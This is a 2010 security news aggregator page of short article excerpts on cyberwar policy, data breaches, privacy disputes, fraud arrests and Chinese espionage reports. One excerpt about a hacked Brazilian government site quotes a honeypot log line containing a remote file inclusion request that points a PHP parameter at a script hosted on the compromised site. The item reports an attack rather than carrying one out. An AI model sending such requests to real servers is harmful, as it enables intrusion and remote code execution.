 New Regulations Will Not Prepare the US for Cyberwar 
 (from infosecisland at 9-4-2010) 
 Senators Rockefeller and Snowe have formulated a new Cybersecurity bill that they describe in today’s Wall Street Journal. (Use Google news to get to the full article.) The Bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the US for cyberwar. Regulations have been tried before. One of the main drivers for investments in IT security have been regulations. California 1386 required the disclosure of data losses that... read more» 
   
 





 2009 Annual Study: Australian Cost of a Data Breach 
 (from Ponemon Institute at 9-4-2010) 
 PGP Corporation and the Ponemon Institute are pleased to report the results of our first annual study concerning the cost of a data breach incidents for Australian companies.Ponemon Institute research indicates that data breaches continue to have serious financial consequences on organisations.... read more» 
   
 





 German anti-Facebook backlash gathers speed 
 (from The Sydney Morning Herald at 9-4-2010) 
 Anti-Facebook feelings in Germany grew Wednesday as a major consumer group urged people to abandon the social networking website unless it scraps planned changes to its privacy policy. "If protection of your personal data is important to you, we can only advise users to oppose the planned changes, and together with their friends to choose another operator," said the Federation of German Consumer Organisations (VZBZ), an umbrella group for 42 German consumer associations.... read more» 
   
 





 Survey: Many Federal IT Pros Skeptical of U.S. Security Readiness 
 (from EWeek at 9-4-2010) 
 The majority of federal IT decision makers in the national defense and security department agencies aren't expecting many changes from the newly named cyber-security coordinator. That's according to a survey of 201 IT pros commissioned by Lumension. The survey, conducted last month by Clarus Research Group, found that more than half "expect only minor policy changes" as a result of the creation of the cyber-security coordinator position. In addition, a full 74 percent view the possibility of ... read more» 
   
 





 South Windsor Student Charged With Hacking School Network 
 (from Courant at 9-4-2010) 
 A South Windsor High School student is accused of hacking into the school's administrative files. Ahmad Abouakar, 18, of 23 Wapping Ave., was arrested Wednesday. He was charged with unauthorized computer use and fifth-degree e-Crime. Abouakar was released after posting $2,500 bail and is due in Superior Court in Manchester on April 15.... read more» 
   
 





 Identity Thieves Filed For $4 Million in Tax Refunds Using Names of Living and Dead 
 (from Wired at 9-4-2010) 
 A group of sophisticated identity thieves managed to steal more than $4 million by filing bogus tax returns using the names and Social Security numbers of other people, many of them deceased, according to a 74-count indictment unsealed in Arizona Thursday. The thieves operated their scheme for at least three years from January 2005 to April 2008, allegedly filing more than 1,900 fraudulent tax returns involving about $4 million in refunds directed to more than 170 bank accounts. The conspirat... read more» 
   
 





 ACMA launches anti-SMS spam hotline 
 (from Computer World at 9-4-2010) 
 The Australian Communications and Media Authority (ACMA) has soft launched an anti-SMS spam hotline. The hotline allows consumers receiving spam SMS to send the offending message directly to a mobile number run by ACMA, rather than through an online form. A source within ACMA said the hotline (0429 999 888) had not yet been officially launched and was currently being trialled among staff and people who regularly complain about SMS spam.... read more» 
   
 





 Exorbitant costs for .brand domain names 
 (from The Age - Australia at 9-4-2010) 
 Australian companies wanting to snare an internet address that incorporates their brand can expect to pay hundreds of thousands of dollars when the process kicks off next year, shutting the door on all but the largest brands. Companies interested in applying for a global top-level domain name, or gLTD, to complement or replace the current .com or .net appendages will have to pay a $202,000 non-refundable fee to the body that oversees domain names.Some call it a cash grab by the Internet Corpo... read more» 
   
 





 Police attack Facebook in dispute over child safety 
 (from Times Online at 9-4-2010) 
 Police have accused Facebook of being arrogant for failing to install a child safety button on its web pages. The social networking site is said to have never reported a case to British police of a suspected paedophile attempting to groom a child. The Child Exploitation and Online Protection Centre (CEOP) has received 252 complaints about possible illegal activity on Facebook in the first three months of this year. None came from Facebook. More than 40 per cent have been about attempted groom... read more» 
   
 





 'Virtual sit-in' tests line between DDoS and free speech 
 (from The Register at 9-4-2010) 
 A University of California professor who organized a "virtual sit-in" that targeted the university president's website has been told he may face criminal charges for mounting a distributed denial of service attack. UC San Diego Professor Ricardo Dominguez spearheaded the March 4 digital protest by calling on demonstrators to visit a webpage that sent a new page request to the UC president's website every one to six seconds. A separate function automatically sent 404 queries to the server. A "... read more» 
   
 





 Matrix actor site stages defacement spat 
 (from The Register at 9-4-2010) 
 Rival hackers are duking it out on the site of Matrix actor Harry Lennix. Lennix, who played Commander Lock in the second two films of the Matrix trilogy and more recently played Boyd in Joss Whedon's Dollhouse, maintains the site harrylennix.com. The site was defaced last week, and just a few days later was sprayed with digital graffiti by another rascal. The second hacker posted claims that the first (SnazzyG) had bought access to the compromised site without actually doing any hacking.... read more» 
   
 





 Spam a Judge, Go To Jail? 
 (from Wired at 9-4-2010) 
 A litigant in a civil lawsuit asked an appeals court Wednesday to overturn his 30-day contempt sentence for urging people to send e-mail to a federal judge. Lots of e-mail. The brouhaha began in February, when TV pitchman Kevin Trudeau urged his radio and web followers to deluge U.S. District Judge Robert Gettleman with e-mail so he would side with him in a civil lawsuit pending before the Chicago judge.... read more» 
   
 





 Brazilian government site hacked 
 (from sucuri at 9-4-2010) 
 Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br. We started to see RFI requests trying to use a file placed inside their "portal" directory: a.185.231.103 - - - "GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0" After examining it we can see again traces of the famous RFI bot scanner: $... read more» 
   
 





 From Cyber War: The Next Threat to National Security and What to Do About It 
 (from NetworkWorld at 9-4-2010) 
 Cyber war is not some victimless, clean, new kind of war that we should embrace. Nor is it some kind of secret weapon that we need to keep hidden from the daylight and from the public. For it is the public, the civilian population of the United States and the privately owned corporations that own and run our key national systems, that are likely to suffer in a cyber war. The entire phenomenon is shrouded in such government secrecy that it makes the Cold War look like a time of openness and tr... read more» 
   
 





 Google mobile services back up in China 
 (from v3 at 9-4-2010) 
 Google's mobile services are back up and running in China after being partially blocked following its move to servers in Hong Kong. The search firm's status report for its services in mainland China was updated yesterday to show that its mobile services are back in action or subject only to minor blocking.... read more» 
   
 





 Wiseguys face the music for trying to play it smart in online ticketing 
 (from washingtonpost at 9-4-2010) 
 In the increasingly sophisticated world of ticket brokering, the Wiseguys have grabbed attention. Whether they are crooked or merely clever will be up to a jury. Federal investigators charge that a ring of hackers working for Wiseguy Tickets Inc. cracked security measures at Ticketmaster and other major vendors. They gained control of 1.5 million tickets to popular and coveted concerts and sporting events nationwide between 2002 and 2009.... read more» 
   
 





 A Chinese ISP momentarily hijacks the Internet (again) 
 (from Computer World at 9-4-2010) 
 For the second time in two weeks, bad networking information spreading from China has disrupted the Internet. On Thursday morning, bad routing data from a small Chinese ISP called IDC China Telecommunication was re-transmitted by China's state-owned China Telecommunications, and then spread around the Internet, affecting Internet service providers such as AT&T, Level3, Deutsche Telekom, Qwest Communications and Telefonica.... read more» 
   
 





 North Korean Red Star operating system details emerge 
 (from BBC at 9-4-2010) 
 Details of a home-grown computer operating system developed by North Korea have emerged. Information about Red Star, as it is known, was made public by a Russian blogger studying in North Korea, who bought the program off the street. Further analysis by a government institute in neighbouring South Korea said the operating system is aimed at monitoring user activity.... read more» 
   
 





 Sick of ‘Cyber’ 
 (from cato-at-liberty at 9-4-2010) 
 Securing our networks doesn’t require some secret advanced NSA technology. It’s the boring network security administration stuff we already know how to do: keep your patches up to date, install good anti-malware software, correctly configure your firewalls and intrusion-detection systems, monitor your networks.... read more» 
   
 





 No-Brainer: How Agencies Can Secure IT 
 (from Govenment Information Security at 9-4-2010) 
 The Federal information Security Management Act of 2003 was a positive step in improving security within the government. The law established the imperative for federal managers to put strong emphasis on cybersecurity. The bill highlighted the need to use a risk based approach to identify and implement the minimum controls and to establish an independent review process. While FISMA has many positive elements, the implementation of FISMA has been less than fully effective. For example, rather t... read more» 
   
 





 Identity theft is a serious problem at Douglas Port 
 (from douglasdispatch at 9-4-2010) 
 U.S. Customs and Border Protection officers stopped an identity theft when they arrested a man who was attempting to make entry into the United States by using someone else’s identity. On March 18th at about 5 p.m., CBP Officers became suspicious of a man who was attempting to make entry into the United States. The man was identified as a 43-year-old Mexican national from Michoacan, Mexico.... read more» 
   
 





 U.K. Approves Crackdown on Internet Pirates 
 (from The New York Times at 9-4-2010) 
 The British Parliament on Thursday approved plans to crack down on digital media piracy by authorizing the suspension of repeat offenders’ Internet connections. Following the House of Commons late Wednesday, the House of Lords on Thursday approved the bill after heavy lobbying from the music and movie industries, which say they suffer huge losses from unauthorized copying over the Internet....read more» 
   
 





 The First Worldwide Cybersecurity Summit 
 (from baidu at 9-4-2010) 
 EWI’s Worldwide Cybersecurity Summit will bring together leaders of governments, businesses and civil society from around the world to determine new measures to ensure the security of the world’s digital infrastructure. While plenary speakers will offer visions for the future of cyberspace, the bulk of the summit will be highly interactive. It will give participants opportunities to collaborate with peers from around the world. The structure has two main components: there are eight sectors, w... read more» 
   
 





 Invitation to engage: Catalyst Conversation Starters 
 (from The Security Catalyst at 9-4-2010) 
 As a believer in the power of asking questions and engaging in conversation, I am starting a new monthly series: catalyst conversation starters. The idea is simple: ask a short question, share some thoughts, then open it up for everyone to participate through comments, the security catalyst community, on twitter and by telephone. As the catalyst, I’ll actively engage, ponder, probe and work to distill the discussion over the course of the month.... read more» 
   
 





 Hacker Voice Radio 
 (from Hackers Voice at 8-4-2010) 
 HVR is an online radio show set up as an vocal forum for all the UK hackers and phreaks to come together, work together and a place to share information. HVR is hosted by either Be|ia| or Naxxtor, frequent co-hosts are 10nix, _hyper_, Vesalius and Blue_Chimp - Tuesday, Wednesday and Thursday at 9pm GMT.... read more» 
   
 





 Microsoft Security Bulletin Advance Notification for April 2010 
 (from Microsoft at 8-4-2010) 
 Executive Summaries : This advance notification provides a number as the bulletin identifier, because the official Microsoft Security Bulletin numbers are not issued until release. The bulletin summary that replaces this advance notification will have the proper Microsoft Security Bulletin numbers (in the MSyy-xxx format) as the bulletin identifier. Affected Software : Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server 2003 Microsoft Windows Vista Microsoft Windows... read more» 
   
 





 eSeminar - The National Security Challenge: Cross-Domain Information Sharing 
 (from Federal Computer Week at 8-4-2010) 
 Federal Computer Week will present Marianne Bailey, director of the Unified Cross Domain Management Office, in an eSeminar at 2 p.m. on Wednesday, April 14, to discuss the unique challenges facing government agencies as they work together to share critical, but not necessarily classified, national security information. As recent events with Flight 253 have highlighted, some of the most critical components of the intelligence enterprise lie not in the gathering of information, but in its disse... read more» 
   
 





 Kundra Outlines Infosec Priorities 
 (from Govenment Information Security at 8-4-2010) 
 The White House has formed an interagency working group to establish the National Cybersecurity Education Initiative. This working group defined four tracks of work that are now underway: * National awareness campaign led by the Department of Homeland Security; * Formal cybersecurity education program led by the Department of Education; * Federal workforce structure program led by the Office of Personnel Management and the Department of Defense; and * National workforce tra... read more» 
   
 





 Survey: Cloud computing risks outweigh reward 
 (from CNet at 8-4-2010) 
 Around 45 percent of IT professionals recently surveyed by the ISACA (formerly known as the Information Systems Audit and Control Association) said the risks involved in cloud computing outshine any benefits. A global organization focused on the auditing and security of information systems, the ISACA conducted its first annual IT Risk/Reward Barometer survey (PDF) in March. Questioning more than 1,800 IT professionals in the U.S. who are members of the group, the ISACA found that only 10 perc... read more» 
   
 





 Many U.S. Government Agencies Have Been Attacked, Survey Says 
 (from DarkReading at 8-4-2010) 
 IT workers in the U.S. federal government say their systems are already under attack, and they don't expect the situation to get better in coming months. According to a survey published today by Clarus Research Group and Lumension, nearly three-quarters of federal IT decision-makers who work in national defense and security departments or agencies say the possibility is "high" for a cyberattack by a foreign nation in the next year. One-third of these respondents say they have already exper... read more» 
   
 





 Google Gives the US Government Access To Gmail 
 (from Slashdot at 8-4-2010) 
 Google condemns the Chinese Government for censoring its results, and Australia for planning to do the same. Meanwhile, its lawyers and security experts have told employees to 'be intentionally vague about whether or not we've given access to end-user accounts,' according to engineer James Tarquin, hinting that Google may be sharing its data with the US government. Perhaps Australia's most hated communications minister, Steven Conroy, could be right in his criticism of Google's privacy record af... read more» 
   
 





 ICO vows to impose heavy fines for major data breaches 
 (from Computing at 8-4-2010) 
 The Information Commissioner’s Office (ICO) has said that it will reserve its new-found power to impose fines of up to £500,000 if cases similar to that involving T-Mobile in November 2009 were to arise again. The ICO has been investigating the mobile network provider after employees allegedly sold details relating to customers’ mobile phone contracts, including their contract expiry dates. It is alleged that the information was being sold on to the service provider’s competitors, whose agent... read more» 
   
 





 Facebook users still unhappy with privacy options 
 (from the tech herald at 8-4-2010) 
 Facebook users are still reacting to proposed privacy settings, and overall are still unhappy with the previous changes to the way personal information is handled by the social networking giant. A recent reader poll by Sophos showed that 95-percent of the 680 users who participated were displeased by the newest proposed changes, and according to Facebook, there were over 4,000 comments on the subject when they opened the proposal to public comment. However, while the Sophos data shows a cl... read more» 
   
 





 Outsourced security extends to wealth of services, study finds 
 (from TechTarget at 8-4-2010) 
 Companies are choosing managed security service providers (MSSPs) to do more than block spam and encrypt email messages. Interest is growing in non-traditionally outsourced security technologies, including log management and patch and configuration management. The market for security services providers grew by about 8% in 2009, despite the economic turmoil that stagnated some security budgets. And the growth is not necessarily all about cutting costs, said Khalid Kark, vice president and pri... read more» 
   
 





 Romanian police, FBI break up 70-strong eBay fraud ring 
 (from scmagazineus at 8-4-2010) 
 Romanian authorities, in conjunction with U.S. law enforcement, have arrested 70 individuals from three different organized cybercrime groups on charges they perpetrated online auction scams that targeted eBay users. The arrests were the result of a string of raids organized by the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT), the agency said in a news release issued on Sunday.... read more» 
   
 





 'Cyber War' author: U.S. needs radical changes to protect against attacks 
 (from NetworkWorld at 8-4-2010) 
 In his new book, Cyber War, Richard Clarke says nations are building up their online armies and weapons largely far from public view, increasing the danger of a deliberate or accidental cyberwar, which in turn could trigger violent conflicts across the globe. "Cyber war has already begun," Clarke writes. "In anticipation of hostilities, nations are already preparing the battlefield.' They are hacking into each other's networks and infrastructures, laying in trapdoors and logic bombs -- now, i... read more» 
   
 





 Security through virtualisation 
 (from h-online at 8-4-2010) 
 A separate virtual system for every task -- that's the basic formula of Qubes' security concept. Qubes, a new operating system presented by Joanna Rutkowska, plans to limit any damage malicious software might do; so even if the game just tested turns out to be a trojan or an attacker is exploiting a WiFi driver bug, our online banking credentials are not at risk. They are safely stored in the banking VM, which runs nothing but online banking.... read more» 
   
 





 Europe Learns The Truth(s) About ACTA 
 (from ip-watch at 8-4-2010) 
 The truth about the Anti-Counterfeiting Trade Agreement (ACTA) is different depending on which side you are on. At a hearing organised by the Liberal Party Group in the European Parliament in Brussels yesterday Canadian law professor and ACTA expert Michael Geist challenged the position of the European Commission and other negotiating parties to the agreement that ACTA would not lead to substantive law changes in the ACTA countries and also explained what possible long-term effects could resu... read more» 
   
 





 HITECH Act increases HIPAA security requirements 
 (from TechTarget at 8-4-2010) 
 The health care industry was buzzing with the news: For the first time ever, a hospital was being audited for compliance with HIPAA security requirements. The audit of Piedmont Hospital in Atlanta by the U.S. Department of Health and Human Services' inspector general in 2007 was surprising for hospitals, health insurers and others in an industry accustomed to a lack of enforcement of federal privacy and security requirements. A year later, HHS took another unusual step, meting out a $100,000 ... read more» 
   
 





 3 Year Sentence For Hacker Who Ripped Off Charles Schwab Accounts 
 (from Forbes at 8-4-2010) 
 A computer hacker who stole a total of $246,000 from Charles Schwab brokerage accounts was sentenced to 37 months' imprisonment in federal court in Manhattan yesterday. Aleksey Volynskiy of Manhattan worked with a crew of Russia-based hackers in 2006 and 2007 to pilfer the Schwab customers' cash and funnel it out of the U.S., according to court papers. The high-tech thieves used "Trojan horse" viruses to steal Internet users' personal account information unnoticed.... read more» 
   
 





 Companies Lag On Cloud Security 
 (from SecurityProNews at 8-4-2010) 
 Most organizations lack the procedures, policies and tools to ensure sensitive information they put in the cloud remains secure, according to a new survey by Symantec and the Ponemon Institute. Despite security concerns and the expected growth in cloud computing, only 27 percent of respondents said their organizations have steps in place for approving cloud applications that use sensitive or confidential information. In most organizations, large gaps exist between those currently evaluating ... read more» 
   
 





 Hackers using search engine optimisation techniques, says Sophos 
 (from ComputerWorldUk at 8-4-2010) 
 IT security firm Sophos has conducted a new research which reveals the automated tools used by Search Engine Optimisation (SEO) hackers and how companies can protect themselves. Sophos said the business of using blackhat SEO techniques to impregnate legitimate sites has become a huge money-spinner for cybercriminals. Every day scores of new malicious campaigns are discovered taking advantage of the hottest news stories on the internet to spread malware; many of them profiting from high profile d... read more» 
   
 





 Researcher Details New Class Of Cross-Site Scripting Attack 
 (from DarkReading at 8-4-2010) 
 A new type of cross-site scripting (XSS) attack that exploits commonly used network administration tools could be putting users' data at risk, a researcher says. Tyler Reguly, lead security research engineer at nCircle, today published a white paper outlining a new category of attack called "meta-information XSS" (miXSS), which works differently than other forms of the popular attack method -- and could be difficult to detect. "Think about those network administration utilities that so man... read more» 
   
 





 Digital Economy Bill passed along by empty House of Commons 
 (from ComputerWorldUk at 8-4-2010) 
 The Digital Economy Bill has been passed to the final stage before becoming law, after a minor debate in which only a handful of the country's 646 MPs turned up. In a near-empty House of Commons yesterday, the bill was passed through to the 'wash-up' phase where legislation is rushed through before an election. It will go to a House of Lords debate this afternoon. Industry insiders said it was highly likely, but not definite, that the Lords would pass the bill into law – though some sectio... read more» 
   
 





 Retailers warned of cyber attacks 
 (from businessworld at 8-4-2010) 
 Credit and debit card firm Visa has issued an alert warning all retailers that cyber-crime attacks on businesses are on the rise, with Windows-based terminals being particularly vulnerable. The rising number of key-logger attacks - where criminals hack a computer and can record the key-strokes on retailers' till terminals - is due to the fact that many units are Windows-driven and therefore susceptible to the same type of malware infections as office and home PCs.... read more» 
   
 





 Warning: Infrastructure not ready for imminent cyber attacks 
 (from Government Computer News at 8-4-2010) 
 An information technology security strategy based on regulatory compliance has left agencies ill-prepared to respond to a constant stream of cyber attacks, according to a recent survey of federal information technology officials commissioned by Lumension Security. “The government view of compliance is very prescriptive,” said Matt Mosher, Lumension's senior vice president for the Americas. “They take security seriously because they are under attack. The government’s reaction is to drive secur... read more» 
   
 





 Report Alleges Vast Cyber Crime Syndicate in China 
 (from esecurityplanet at 8-4-2010) 
 A sophisticated network of hackers operating out of China has launched cyber attacks against the computer systems of the office of the Dalai Lama, the United Nations, the Indian government and other nations, according to a new report released this week. Security researchers at the Information Warfare Monitor and the Shadowserver Foundation said they recovered a large quantity of sensitive documents in their investigation, including classified materials filched from India's national security a... read more» 
   
 





 Mandybill: All the Commons drama 
 (from The Register at 8-4-2010) 
 Live TV and internet coverage allowed the nation to feel grubby as the Mandybill was shunted through the House of Commons late last night. The government’s replacement for Clause 18 – a catch-all illiberal web-blocking measure that few in the music business ever expected to survive – was approved, and the photographers cemented a spectacular victory by crushing the orphan works clause. But not before a bit of spirited resistance – or token posturing – take your pick, for it in truth it was a ... read more» 
   
 





 Needed: Isolated network to thwart cyber theft 
 (from expressbuzz at 8-4-2010) 
 The massive hacking by a Chinese espionage network into the Indian Government’s defence and other confidential information has exposed the vulnerability of cyber security in the country. In the wake of the incident, cyber security experts point out the need for having an isolated network for securing critical information. It has come to light that critical and confidential information were leaked through social networking sites and other similar websites. Cyber security experts say that... read more» 
   
 





 ID Theft Ring Gleaned Socials From Medical Records 
 (from Finextra at 8-4-2010) 
 Medical identity theft occurs when the perpetrator uses your name and in some cases other aspects of your identity, such as insurance information, to obtain medical treatment or medication or to make false claims for treatment or medication. As a result, erroneous or fraudulent entries wind up on your medical records, or sometimes entirely fictional medical records are created in your name. Financial identity theft as it relates to new account fraud is when an identity thief gets the victim’... read more» 
   
 





 Green data centre standard agreed by US, Japan and Europe 
 (from TechWorld at 8-4-2010) 
 Industry groups and government agencies from the US, Europe and Japan have reached a basic agreement on how to measure the energy efficiency of data centres. The agreement is seen as significant because it establishes a common metric that different types of data centres, in different parts of the world, can use to report their level of energy efficiency. That could provide a yardstick for companies to assess the efficiency of their own data centres, and also to gauge the effectiveness of energy-... read more» 
   
 





 New approach allows computer programs to run up to 20% faster 
 (from DNAIndia at 8-4-2010) 
 A new approach to software development, designed by researchers at North Carolina State University, could allow common computer programs to run up to 20% faster and possibly incorporate new security measures. For the first time, researchers have found a way to run different parts of some programs, like widely used programs as word processors and Web browsers, at the same time. This makes the programs operate more efficiently.... read more» 
   
 





 Report: Chinese Hackers Target India 
 (from enterprise-security-today at 8-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 Vietnam Calls Malware Claims 'Groundless' 
 (from enterprise-security-today at 8-4-2010) 
 Vietnam has dismissed what it called "groundless" accusations from Google and McAfee that the communist country had apparently used malicious computer programs to hack Web sites and spy on political opponents. Google Inc. said Vietnam had apparently used software known as "malware" to snoop on opponents of a controversial bauxite mine planned for Vietnam's Central Highlands. It said the cyberattacks had targeted "potentially tens of thousands of people."... read more» 
   
 





 Research into Nigerian 419 Scam Could Lead to Improved Anti-Phishing Technologies 
 (from Physorg at 8-4-2010) 
 For seven years, Harriet Ottenheimer, a K-State professor emeritus of anthropology and a Fulbright scholar to the Czech Republic, and her son, Davi Ottenheimer, president of security consultancy flyingpenguin, collected and analyzed Nigerian 419 e-mails for clues that could be used to block these messages. These spam e-mails are called Nigerian 419 messages, or 419 for short. The number "419" refers to an article of the Nigerian Criminal Code concerning fraud. Typically the messages ask for t... read more» 
   
 





 North Korea's "Red Star" Software System 
 (from Thesop at 8-4-2010) 
 Korea is often declared to be the world`s most computer-literate, wired, online society. Of course, that is the southern version. The northern one apparently lags behind, to say the least. The "Red Star" computer operating system has some good and bad points, as all computer operating systems invariably do. On the plus side, according to a Reuters report, it has "good startup music", the Korean folk song "Arirang", which is popular on both sides of the border. And it features world-class secu... read more» 
   
 





 How to Track a Hacker 
 (from The New New internet at 8-4-2010) 
 Bill O’Reilly, Paris Hilton and Sarah Palin have one thing in common, apart from being celebrities: They’ve all been victims of hacking. Although the media spotlight hit all three public figures, it was Palin’s bad fortune that got the most attention. Right before the presidential election in 2008, a hacker gained unauthorized access to the vice president hopeful’s personal email account gov.palin@yahoo.com. It wasn’t hard for the hacker to figure out her security questions (her date of birth... read more» 
   
 





 Botnets 'the Swiss Army knife of attack tools' 
 (from ComputerWorld at 8-4-2010) 
 Hacker militias reach for the closest tool at hand -- botnets already up and running, already reaping ill-gotten gains -- when they mobilize to attack the information infrastructure of other countries, security experts say. "They just pick up what they use every day," said Joe Stewart, director of malware analysis at SecureWorks Inc. and a noted botnet researcher. "[Militias] don't have much time to ramp up, just days, so it has to be something already in use."... read more» 
   
 





 Hackers using Twitter for cyber spying 
 (from thechronicleherald at 8-4-2010) 
 Ottawa must take urgent action on cyberspace security, or risk falling victim to targeted attacks by hackers using social media such as Twitter to glean secret government or corporate information, Canadian researchers said Tuesday. The team of researchers from the University of Toronto and Ottawa-based SecDev Group released a report Tuesday documenting a complex cyber espionage system of Chinese hackers. Twitter and email were among the tools used to access highly sensitive documents from ... read more» 
   
 





 Security training won't solve the negligent insider threat 
 (from scmagazineus at 8-4-2010) 
 2010 was barely underway before news of the year's first sensational data breach hit the wires. Internet giant Google announced that it was the victim of a sophisticated attack from China designed to break into accounts of political dissidents hosted by the company. Details are scant, but one disclosure in particular does stand out.... read more» 
   
 





 Korea reigns as king of malware threats 
 (from infosecurity-us at 8-4-2010) 
 The US has lost its place atop the leader board as the chief source of malware in March, as research from Network Box indicates Korea – mainly South Korea – can now claim the top spot when phishing attempts are included in the statistics. Security services provider Network Box, in its analysis of March internet threats, said that Korea was the source of the most malware as a percentage for the month, coming in at just under one-third (31.1%) of all viruses being distributed via the internet.... read more» 
   
 





 Let's not create a cyberbullying panic 
 (from CNet at 8-4-2010) 
 Recent stories in the press about teenage cyberbullying and real-world bullying are sickening. It's hard to know how much cyberbullying contributed to her decision to kill herself, but the case of Phoebe Prince brings tears to my eyes. The South Hadley, Mass., 15-year-old was reportedly the brunt of repeated cruelty at the hands of classmates (six of whom are now facing criminal charges) until she put an end to her life.... read more» 
   
 





 Student blocked access to finish degree: Addicted to Facebook? 
 (from ZDNet at 8-4-2010) 
 Students around the world are facing, in some cases, their last week at university, with looming deadlines and essay and dissertations to submit. Many have already finished, but some like myself have until the end of this week to hand in everything they have before the scrutiny of their academic achievements are met and their degree classification is out of their hands. I assure you: being a student at this time of year is far from stress free. Students worldwide are sweating like a Vegas Elv... read more» 
   
 





 Israel using Facebook as 'spying tool' in Gaza 
 (from The Register at 8-4-2010) 
 Hamas has accused Israel of using Facebook to recruit spies from among the Palestinian community in the Gaza strip. For years Israel has maintained a network of agents in the West Bank and Gaza. Those discovered face torture and almost certain execution as collaborators. Hamas reckons fans of Bookface and similar services are giving away too much personal information on social networking sites and this, in turn, leaves them open to attempts to coerce them into becoming spies. How someone can ... read more» 
   
 





 Opening Keynote: Mike McConnell (Symposium Summary) 
 (from Cerias at 8-4-2010) 
 Mike McConnell, retired Admiral of the Navy, former Director of NSA and former Director of National Intelligence delivered the opening keynote speech for the eleventh annual CERIAS Security Symposium. The majority of this keynote was devoted to recounting his experiences and efforts to move forward national cyber capabilities. The following is a summary of those efforts.... read more» 
   
 





 Panel #3: The Evolution of Research Funding and Projects (Symposium Summary) 
 (from Cerias at 8-4-2010) 
 The panel was started by Petros Mouchtaris. He said that applying for funding is not that bad although the researcher gets a lot of rejections, but then also once the funding comes through it gives the researcher a lot of control about the areas he wants to work in. He said in the last 10 years most of their funding came from DARPA, initially the funding was for long-term small projects. He said that a smaller, long-term project gives more time to foster basic research about abstract ideas.... read more» 
   
 





 'Activist' UCSD professor facing unusual scrutiny 
 (from SignOnSanDiego at 8-4-2010) 
 UCSD professor Ricardo Dominguez is facing unusual scrutiny from campus police and auditors for his involvement in two divisive projects — one that helps migrants find water stored along the border and another that disrupted the UC president’s Web site through a virtual sit-in. Dominguez, 50, is a self-described activist and new media artist who is accustomed to stirring up controversy. But he said he’s troubled that his tenured status may be revoked for work that promotes his academic specia... read more» 
   
 





 Many managers see cloud computing as risky business 
 (from Computer World at 8-4-2010) 
 Despite the hoopla surrounding cloud computing, almost half of U.S. IT managers are still wary of using cloud computing services within their own operations, according to the results of a survey released Wednesday by the Information Systems Audit and Control Association (ISACA). In the ISACA IT Risk/Reward Barometer, an online survey that attracted 1,809 responses from ISACA members, 45 percent of the participants indicated that the risks of cloud computing outweigh the benefits.... read more» 
   
 





 Why Hackers Love the Cloud 
 (from Arbornetworks at 8-4-2010) 
 The growth of cloud services has led many enterprises to move data and applications to the cloud, but the hacker community is also moving there. With content consolidation and multi-tenant infrastructures comes more opportunities for hackers to steal data or conduct DDoS attacks with greater ease. Danny McPherson, VP and Chief Security Officer at Arbor Networks, discusses some of the ways hackers are eyeing cloud services and what IT can to to face these threats. (12:51)... read more» 
   
 





 Data loss a mystery for many businesses 
 (from Computer World at 8-4-2010) 
 Despite the increasing awareness of penalties and the damage that losing personal data can do to corporate reputations, network security executives are getting less certain that they can figure out if personal data has been compromised when corporate laptops are lost or stolen. When TheInfoPro asked the security professionals in the middle of last year, 40% said they could not determine if personally identifiable information (PII) was lost in cases of laptops gone missing. Six months later, t... read more» 
   
 





 DeepSec :In-Depth Security Conference 2010 Europe — Date TBA 
 (from deepsec at 8-4-2010) 
 The In-Depth security conference will include two days of security talks during the conference and two days of trainings, covering the latest topics in network and IT security. There will be also a comprehensive social program around the event. We're inviting you to submit proposals for trainings and conference talks. All proposals received before July 31th 2010, 23:59 CEST will be considered by the program committee. Topics of special interest include : - Operating System Security (7, X... read more» 
   
 





 Maley: Here's How Firing REALLY Went Down 
 (from CSOonline at 8-4-2010) 
 Former State of Pennsylvania CISO Robert Maley has been watching all the news about his firing for talking about a security incident without permission at last month's RSA conference. He wants everyone to know that they shouldn't believe everything they read and hear. He began a talk on application security at CSO Perspectives 2010 Tuesday by going off topic and addressing the controversy head on. He said he was at RSA while on vacation because the state had cut the security budget by 38 perc... read more» 
   
 





 Wikipedia as IP theft enabler? - Wikipedia and the Matter of Responsibility 
 (from Acmuller at 8-4-2010) 
 For many, and perhaps the majority of web users, Wikipedia is simply wonderful. For me, however, as a person devoted to the development of rigorous and responsible online reference works, Wikipedia is like a cancer growing on the Internet, silently and anonymously leeching off all the creative work from web pages developed by various artists and intellectuals. By the time you happen to find your work copied onto Wikipedia, it has already been propagated all over the net by Wikipedia copycats, ma... read more» 
   
 





 Romania Swoops In on 70 Cybertheft Suspects 
 (from Wired at 8-4-2010) 
 Romanian police arrested 70 suspects Tuesday who they claim were involved in eBay scams and other cybercrimes since 2006. Believed to be members of three separate gangs, the scammers used phishing attacks to get the login credentials of eBay account holders, then used the accounts to auction nonexistent goods. Police have identified approximately 800 victims who sent money for non-existent Rolex watches, cars, yachts, private airplanes and other luxury goods. Buyers from around the world lost... read more» 
   
 





 It’s Cyberwar! Let’s Play Bingo! 
 (from Wired at 8-4-2010) 
 While it’s clear from the cyberwar news that we are living in a war zone when we turn on our computers, we at Wired.com refuse to surrender — even at the risk of taking an e-bullet in the name of Freedom. So strap on your iFlak jackets and use this Wired.com CyberWar bingo card the next time you go to read a Cyberwar story. If you can’t figure out where to start, try this piece from NPR.... read more» 
   
 





 ISP Privacy Proposal Draws Fire 
 (from KrebsonSecurity at 8-4-2010) 
 A proposal to let Internet service providers conceal the contact information for their business customers is drawing fire from a number of experts in the security community, who say the change will make it harder to mitigate the threat from spam and malicious software. The American Registry for Internet Numbers (ARIN) — one of five regional registries worldwide that is responsible for allocating blocks of Internet addresses – later this month will consider a proposal to ease rules that requir... read more» 
   
 





 Romanian police arrest 70 phishers and fraudsters 
 (from Sophos at 8-4-2010) 
